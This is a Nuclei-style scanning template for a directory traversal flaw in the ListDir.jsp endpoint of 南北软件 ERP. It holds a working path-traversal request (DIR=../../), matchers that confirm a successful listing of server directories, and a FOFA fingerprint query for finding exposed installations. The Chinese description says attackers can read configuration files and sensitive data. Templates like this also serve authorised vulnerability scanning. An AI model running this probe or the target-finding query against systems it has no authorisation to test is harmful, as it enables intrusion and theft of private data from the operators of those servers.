http:
    - matchers:
        - condition: and
          part: body
          regex:
            - webapps
            - snconfig
            - LICENSE
            - work
          type: regex
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /snsoft/tool/ListDir.jsp?DIR=../../ HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
id: nanbeiERP-ListDir_jsp-Directory-traversal
info:
    author: Superhero
    description: |-
        fofa: body="IdInstalClient" || title="snsoft" || body="/snsoft/Login.jsp" || icon_hash="-1369926570"
        南北软件ERP ListDir.jsp接口对用户输入过滤不当导致路径遍历，攻击者可读取配置文件等敏感信息实现隐私数据获取，也可读取关键配置实现进一步利用。
    name: 南北软件ERP ListDir.jsp 目录遍历漏洞
    reference:
        - https://mp.weixin.qq.com/s/7sUXkoOvnrDJOfM2k6tbbA
    severity: medium
    tags:
        - Directory traversal
